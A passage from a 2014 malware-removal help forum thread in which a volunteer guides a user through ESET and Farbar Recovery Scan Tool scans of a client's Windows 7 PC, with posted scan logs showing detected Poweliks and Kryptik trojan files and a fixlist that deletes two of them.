09:21:54.0496 0x0304  [ 353A04C273EC58475D8633E75CCD5604, FFAE53B6B53AEFC9E8A10BF27480E072D74430276BEB532FE1D473E9616D8CE0 ] WatAdminSvc     C:\Windows\system32\Wat\WatAdminSvc.exe
09:21:54.0525 0x0304  WatAdminSvc - ok
09:21:54.0588 0x0304  [ 691E3285E53DCA558E1A84667F13E15A, 12EDB66EF8FC100402BEA221F354D3BD5542F6DDF715B6E7D873D6BAE7E3D329 ] wbengine        C:\Windows\system32\wbengine.exe
09:21:54.0611 0x0304  wbengine - ok
09:21:54.0641 0x0304  [ 9614B5D29DC76AC3C29F6D2D3AA70E67, A2FFB92F0030B4CD771E862DA575ECCF2F3A5B4B85858C1241A0C59262C0EC88 ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
09:21:54.0645 0x0304  WbioSrvc - ok
09:21:54.0690 0x0304  [ 34EEE0DFAADB4F691D6D5308A51315DC, A040A03E25A0C78B9E26F86C2DF95BCAF8E7EC90183CEB295615D3265350EBEE ] wcncsvc         C:\Windows\System32\wcncsvc.dll
09:21:54.0690 0x0304  wcncsvc - ok
09:21:54.0706 0x0304  [ 5D930B6357A6D2AF4D7653BDABBF352F, 677FF2ED14EE0B0CAA710DA81556CC16D5971DAB10E7C7432D167A87CA6F0EAA ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
09:21:54.0706 0x0304  WcsPlugInService - ok
09:21:54.0737 0x0304  [ 1112A9BADACB47B7C0BB0392E3158DFF, 1AE2AFA125973571F91E6945FE8A735F63D76EBB250A0075D98C580167FD9ED4 ] Wd              C:\Windows\system32\DRIVERS\wd.sys
09:21:54.0737 0x0304  Wd - ok
09:21:54.0798 0x0304  [ 25944D2CC49E0A6C581D02A74B7D6645, AF8FFAFEC07F1A6A3D4008E609E8E1D705A8DFCC7995C766E3946887203F7BEE ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
09:21:54.0798 0x0304  Wdf01000 - ok
09:21:54.0813 0x0304  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiServiceHost  C:\Windows\system32\wdi.dll
09:21:54.0829 0x0304  WdiServiceHost - ok
09:21:54.0829 0x0304  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiSystemHost   C:\Windows\system32\wdi.dll
09:21:54.0829 0x0304  WdiSystemHost - ok
09:21:54.0981 0x0304  [ 75E8EBD7040CE238684333F97014762A, 2CA0B267FBAEB303D1F8B639D733DC0DE17BA1276CC9096035B4F2BBBED3EF7F ] WebClient       C:\Windows\System32\webclnt.dll
09:21:54.0982 0x0304  WebClient - ok
09:21:55.0013 0x0304  [ 760F0AFE937A77CFF27153206534F275, A53940BA28854486FF18F16B98A3314B36322B0B6EFB54D08B921315BEB0ADD5 ] Wecsvc          C:\Windows\system32\wecsvc.dll
09:21:55.0013 0x0304  Wecsvc - ok
09:21:55.0045 0x0304  [ AC804569BB2364FB6017370258A4091B, 1856F354146A5946F3E7D0DD09726FC8A3502B0F0776FEADDF10669C81CC28E2 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
09:21:55.0045 0x0304  wercplsupport - ok
09:21:55.0080 0x0304  [ 08E420D873E4FD85241EE2421B02C4A4, E1E9436EB096FF7DE9A76DA6217035257EF9FC7565DDB9016DCA3859E7F1EF0F ] WerSvc          C:\Windows\System32\WerSvc.dll
09:21:55.0083 0x0304  WerSvc - ok
09:21:55.0100 0x0304  [ 8B9A943F3B53861F2BFAF6C186168F79, 88E2F79F32AFBA17CB8377A508B83A1EC2315E9F3A365F591C87FE4525AA6713 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
09:21:55.0100 0x0304  WfpLwf - ok
09:21:55.0116 0x0304  [ 5CF95B35E59E2A38023836FFF31BE64C, CEA21302B3E855EE592810D4E0DE10E47A47A393064C435463CD54598735CD8D ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
09:21:55.0116 0x0304  WIMMount - ok
09:21:55.0353 0x0304  [ 082CF481F659FAE0DE51AD060881EB47, BB67D2AF0BB9192D4CCF66C23D80CE5A1B38715556D94E2561DBF8F805FA30A5 ] WinDefend       C:\Program Files\Windows Defender\mpsvc.dll
09:21:55.0371 0x0304  WinDefend - ok
09:21:55.0402 0x0304  WinHttpAutoProxySvc - ok
09:21:55.0451 0x0304  [ F62E510B6AD4C21EB9FE8668ED251826, FA3E5CAC3E67E49377320CFBE4646585E6B62168292768FEA81E4623F9166890 ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
09:21:55.0451 0x0304  Winmgmt - ok
09:21:55.0513 0x0304  [ 1B91CD34EA3A90AB6A4EF0550174F4CC, 5B6618615EBFBA594C945AD35F5C68DA8C6053892B6D12D626BB6120910D80DC ] WinRM           C:\Windows\system32\WsmSvc.dll
09:21:55.0529 0x0304  WinRM - ok
09:21:55.0713 0x0304  [ 16935C98FF639D185086A3529B1F2067, E9C6B73A572A04FCE9B1B0E6815F941B10332D9A6D55B92927C2B1275F119091 ] Wlansvc         C:\Windows\System32\wlansvc.dll
09:21:55.0729 0x0304  Wlansvc - ok
09:21:55.0918 0x0304  [ 5144AE67D60EC653F97DDF3FEED29E77, F6238767284B2356A9F502E2ACCFAAC283FA13CBF238E98B5115A55179526B10 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
09:21:55.0943 0x0304  wlidsvc - ok
09:21:56.0229 0x0304  [ 0217679B8FCA58714C3BF2726D2CA84E, 4494984B922DCF24D37BCD0E6831CEBD07D1CA49235D04E821D17ED3DF84ED2A ] WmiAcpi         C:\Windows\system32\drivers\wmiacpi.sys
09:21:56.0229 0x0304  WmiAcpi - ok
09:21:56.0279 0x0304  [ 6EB6B66517B048D87DC1856DDF1F4C3F, EBB534C4829477C70062ADBB5626236B02FE563A544C53FA255E79F3CA170FE8 ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
09:21:56.0281 0x0304  wmiApSrv - ok
09:21:56.0662 0x0304  [ 3B40D3A61AA8C21B88AE57C58AB3122E, 6C67DCB007C3CDF2EB0BBF5FD89C32CD7800C20F7166872F8C387BE262C5CD21 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\wmpnetwk.exe
09:21:56.0682 0x0304  WMPNetworkSvc - ok
09:21:56.0698 0x0304  [ A2F0EC770A92F2B3F9DE6D518E11409C, 6838F2148B11285E00DC449D51F8AD85AAE57694E89BA2C607B87AC1C650D845 ] WPCSvc          C:\Windows\System32\wpcsvc.dll
09:21:56.0698 0x0304  WPCSvc - ok
09:21:56.0745 0x0304  [ AA53356D60AF47EACC85BC617A4F3F66, 155CB8112AA382D841C1891750FF29EF4F1BF716CD9CDF0F2243209E2CCCAC98 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
09:21:56.0745 0x0304  WPDBusEnum - ok
09:21:56.0798 0x0304  [ 6DB3276587B853BF886B69528FDB048C, 9972FF6DF0DF6F86D1E9BCEF4C29064748B217DA196B0633C30D3D580144951C ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
09:21:56.0798 0x0304  ws2ifsl - ok
09:21:56.0829 0x0304  [ 6F5D49EFE0E7164E03AE773A3FE25340, 15B6AFF7455538189A96F8863CC995A271E02C6FBDAC15B037D44DDA65E61339 ] wscsvc          C:\Windows\system32\wscsvc.dll
09:21:56.0844 0x0304  wscsvc - ok
09:21:56.0944 0x0304  [ 553F6CCD7C58EB98D4A8FBDAF283D7A9, 71FBE50C470D1F54FDAADCECEC2CB021AE240CD59DE4E8EB5BCAA6E7F2F86560 ] WSDPrintDevice  C:\Windows\system32\DRIVERS\WSDPrint.sys
09:21:56.0944 0x0304  WSDPrintDevice - ok
09:21:56.0999 0x0304  [ 7DC0270CFD4A05B4112E3EBBF083B595, DF4FCDE511F0B68B6C6E28C820EB722C34710F31A16023A9A297EAD228E00137 ] WSDScan         C:\Windows\system32\drivers\WSDScan.sys
09:21:56.0999 0x0304  WSDScan - ok
09:21:57.0014 0x0304  WSearch - ok
09:21:57.0144 0x0304  [ D9B0134913E5EF007AF82A418C503322, 7418DD28C8E968674382F8352AAFFC4DE77887E2B71B8844D615F19432B4C55A ] wuauserv        C:\Windows\system32\wuaueng.dll
09:21:57.0175 0x0304  wuauserv - ok
09:21:57.0216 0x0304  [ 06E6F32C8D0A3F66D956F57B43A2E070, 9A6BD96A28294B0372F16E13D652FD603308F64B74A56E41E0C68C5E8011F943 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
09:21:57.0216 0x0304  WudfPf - ok
09:21:57.0247 0x0304  [ 867C301E8B790040AE9CF6486E8041DF, D867D6498C987944D99508B2FAD6D6B749FA1EDFE8124B0863D4A642352F0855 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
09:21:57.0247 0x0304  WUDFRd - ok
09:21:57.0299 0x0304  [ FE47B7BC8EA320C2D9B5E5BF6E303765, 34518DBD1E9EA6E5DA62273B18613761E1D9C6B4E074A93C6D639FBAF02222EA ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
09:21:57.0300 0x0304  wudfsvc - ok
09:21:57.0347 0x0304  [ 7CC38741B8F68F1E0D5D79DA6123666A, F90D2DA1C9AFB506C381CD386E1430931B5F81813FEDFD720F87FBC54E7A00DA ] WwanSvc         C:\Windows\System32\wwansvc.dll
09:21:57.0347 0x0304  WwanSvc - ok
09:21:57.0363 0x0304  ================ Scan global ===============================
09:21:57.0399 0x0304  [ DAB748AE0439955ED2FA22357533DDDB, 73EDD402C7479DDCE1998D0C7E99E1EC2974F64EFC33A851439CC85D09EDCDF9 ] C:\Windows\system32\basesrv.dll
09:21:57.0450 0x0304  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:21:57.0490 0x0304  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:21:57.0518 0x0304  [ 364455805E64882844EE9ACB72522830, 906561DBBB33F744844CF27E456226044C85DF0FCFD26DE1FD11E09E2CFA6F8F ] C:\Windows\system32\sxssrv.dll
09:21:57.0549 0x0304  [ 5F1B6A9C35D3D5CA72D6D6FDEF9747D6, D7BC4ED605B32274B45328FD9914FB0E7B90D869A38F0E6F94FB1BF4E9E2B407 ] C:\Windows\system32\services.exe
09:21:57.0549 0x0304  [ Global ] - ok
09:21:57.0549 0x0304  ================ Scan MBR ==================================
09:21:57.0567 0x0304  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
09:21:59.0182 0x0304  \Device\Harddisk0\DR0 - ok
09:21:59.0182 0x0304  ================ Scan VBR ==================================
09:21:59.0282 0x0304  [ D9A75FBEF39E92189FCB8961791DE7C7 ] \Device\Harddisk0\DR0\Partition1
09:21:59.0282 0x0304  \Device\Harddisk0\DR0\Partition1 - ok
09:21:59.0313 0x0304  [ C255B923CA073ED4958E953C408EFA53 ] \Device\Harddisk0\DR0\Partition2
09:21:59.0313 0x0304  \Device\Harddisk0\DR0\Partition2 - ok
09:21:59.0693 0x0304  [ 66CD029C494AF0D035725BFB53E000EA ] \Device\Harddisk0\DR0\Partition3
09:21:59.0698 0x0304  \Device\Harddisk0\DR0\Partition3 - ok
09:21:59.0700 0x0304  ================ Scan generic autorun ======================
09:21:59.0982 0x0304  [ 8C48FEDC3FAA7F14C72557D49DC4FDF6, 51DA51F18348C42702DD1D1CFA149D6E1173FC77A8F5D43C9DC9A305FF6EBFC6 ] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
09:22:00.0197 0x0304  RtHDVCpl - ok
09:22:00.0497 0x0304  [ 1E69319B2F7C46070DC8E6BAF0941FE2, 709FF756E6A09857F1C84F384903C6A64B36D2702F1568E404D97CE2649F6D74 ] C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
09:22:00.0513 0x0304  picon - ok
09:22:00.0560 0x0304  [ 56695FAD23373AFCF3CB6D9C2B529337, E13DD9A405EA2193D91959AB848A3C6255091DC151158256C9DC54F17654D1FA ] C:\Program Files\PDF Complete\pdfsty.exe
09:22:00.0578 0x0304  PDF Complete - ok
09:22:00.0615 0x0304  [ 8A7F55E5B5543C95D8AF191BCBF6D125, 6DE8F960AEF4D953804CF9FFE813392BF7A3AFF798829B5D325204883CBD49A8 ] C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe
09:22:00.0630 0x0304  Microsoft Default Manager - ok
09:22:00.0959 0x0304  [ A0F17425047BE16181075F80E3285E97, C19685FC14146728FDD83728485375C5F5E1843A61BE9584B3DFDA16561D0616 ] C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe
09:22:00.0982 0x0304  MVS Splash - ok
09:22:00.0998 0x0304  [ BAE17CAD1AB90549AE6D685435BF9D0A, 80B3ED37DD8DC2078A150B757C8B4C6F48E7B941B94FC57CB147D4CB74D66097 ] C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe
09:22:01.0013 0x0304  McAfee Managed Services Tray - ok
09:22:01.0029 0x0304  [ 2562EA6C84097C2529C4E0D1ABE6A2FB, A45E8EA519F69B10C9D6B81D4C2D87A2891C71F05719753FB6D32E08AC2DB02C ] C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
09:22:01.0029 0x0304  SiteAdvisor - ok
09:22:01.0060 0x0304  [ 1029B84ECBE4B95ACB8491A3FE63D70F, DF765BEE2B20800646F70B9E473B95F52457316CB331A3E0BF6974D827AB989D ] C:\Windows\system32\igfxtray.exe
09:22:01.0060 0x0304  IgfxTray - ok
09:22:01.0082 0x0304  [ 3CD5BBDA19A1AB4EBA359E0A14FDF0F0, 992E7322C86DA533F6DB9192427EBDC5A8F4D1A878F4B30A17ABD54656CFF6C1 ] C:\Windows\system32\hkcmd.exe
09:22:01.0082 0x0304  HotKeysCmds - ok
09:22:01.0097 0x0304  [ 3142195521FEE436088EE8A5748DE1B1, EE8E65977AA0EAC0BF48F7C4620946E48679F047EFC515D5F2E52EA4B88C5731 ] C:\Windows\system32\igfxpers.exe
09:22:01.0113 0x0304  Persistence - ok
09:22:01.0323 0x0304  [ 048EA4B978851788E9F5E8E4F081DF7A, EB62719AC0DCC18FF056F2CD84438BF14B61E38F0619617C81961C6257BDFCEC ] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
09:22:01.0354 0x0304  Adobe ARM - ok
09:22:01.0483 0x0304  [ DD79A6B15C2F28DE98DF4852AAF6B13B, 0F7E9023E0BA4B40E2DE9A9FA34E85FEAF72B93049AAB3E1D73AD046BB113E05 ] C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe
09:22:01.0483 0x0304  NCPluginUpdater - ok
09:22:01.0514 0x0304  [ 5D61BE7DB55B026A5D61A3EED09D0EAD, D32CC7B31A6F98C60ABC313ABC7D1143681F72DE2BB2604711A0BA20710CAAAE ] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
09:22:01.0514 0x0304  swg - ok
09:22:01.0514 0x0304  Waiting for KSN requests completion. In queue: 43
09:22:02.0529 0x0304  Waiting for KSN requests completion. In queue: 43
09:22:03.0529 0x0304  Waiting for KSN requests completion. In queue: 13
09:22:04.0545 0x0304  AV detected via SS2: McAfee® Total Protection™ for Small Business,  (  ), 0x40010 ( disabled : outofdate )
09:22:04.0545 0x0304  Win FW state via NFP2: enabled
09:22:07.0342 0x0304  ============================================================
09:22:07.0342 0x0304  Scan finished
09:22:07.0342 0x0304  ============================================================
09:22:07.0342 0x02b8  Detected object count: 0
09:22:07.0342 0x02b8  Actual detected object count: 0
09:22:10.0883 0x09d0  Deinitialize success
 


#7 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 30 October 2014 - 01:21 PM

Let's do a final check up:

Step 1


Please downloadesetlogo.pngOnline Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start installer.pngwith administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Choose the following settings:
settings.png
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log filelog.pngis created at logpath.png
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!
eset.gif


lesestoff.png

Can you please tell me which problems still persist now?
How is the computer running now?

Edited by deeprybka, 30 October 2014 - 01:23 PM.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#8 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 02 November 2014 - 10:38 AM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#9 ScotDesort

ScotDesort
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 03 November 2014 - 10:54 AM

Thank you for the follow-up. I am unable to get to my client's computer until tomorrow.



#10 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 03 November 2014 - 03:21 PM

OK... :)

 

Thanks for letting me know


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#11 ScotDesort

ScotDesort
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 04 November 2014 - 10:30 AM

ESET Log:

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=1800e91f713fa7459d38b5b5bc230ddb
# engine=20912
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-11-03 10:44:31
# local_time=2014-11-03 05:44:31 (-0500, Eastern Standard Time)
# country="United States"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1=''
# compatibility_mode=5893 16776573 100 94 0 166599462 0 0
# scanned=158905
# found=4
# cleaned=0
# scan_time=2495
sh=22012649AA10CDAD79D212BBB84379D8D89FA494 ft=1 fh=b57fdac6a7ca6449 vn="a variant of Win32/Kryptik.COSZ trojan" ac=I fn="C:\FRST\Quarantine\C\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\thawbrkr.dll"
sh=612670E7D9FDF830F306B1A6E66B8BC394C7BE20 ft=0 fh=0000000000000000 vn="Win32/Poweliks.C trojan" ac=I fn="C:\Qoobox\Quarantine\Registry_backups\CLSID_{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}.reg.dat"
sh=805B65B464690312D336B4997A506B635418F5E2 ft=1 fh=33b109c4cd90c0e7 vn="Win32/TrojanDownloader.Tracur.AM trojan" ac=I fn="C:\Users\KELI\AppData\LocalLow\jbtzpjy.dll"
sh=58B0F131807508594519FCEA1431D65707FEBA6A ft=1 fh=dd93094cda03343e vn="a variant of Win32/Kryptik.CLAE trojan" ac=I fn="C:\Users\KELI\AppData\LocalLow\nsshxvi.dll"
 
 
Computer seems much better now, but I have left it disconnected from the internet most of the time until this is completely resolved. While connected to the internet, the effects of Poweliks do not seem to be happening any more.


#12 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 04 November 2014 - 11:13 AM

Hi,

please do the following:

Step 1

frst.pngfrstfix.png

Press thew7.png + R on your keyboard at the same time. Type notepad and click OK.
  • Copy the entire content of the codebox below and paste into the notepad document:
    C:\Users\KELI\AppData\LocalLow\jbtzpjy.dll
    C:\Users\KELI\AppData\LocalLow\nsshxvi.dll
    EmptyTemp:
    
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

After the Reboot:

Step 2

frst.pngfrstscan.png

Start FRST with administator privileges.
  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#13 ScotDesort

ScotDesort
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 06 November 2014 - 08:47 AM

FRST.TXT:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 04-11-2014
Ran by KELI (administrator) on ATTY-2 on 06-11-2014 08:44:17
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
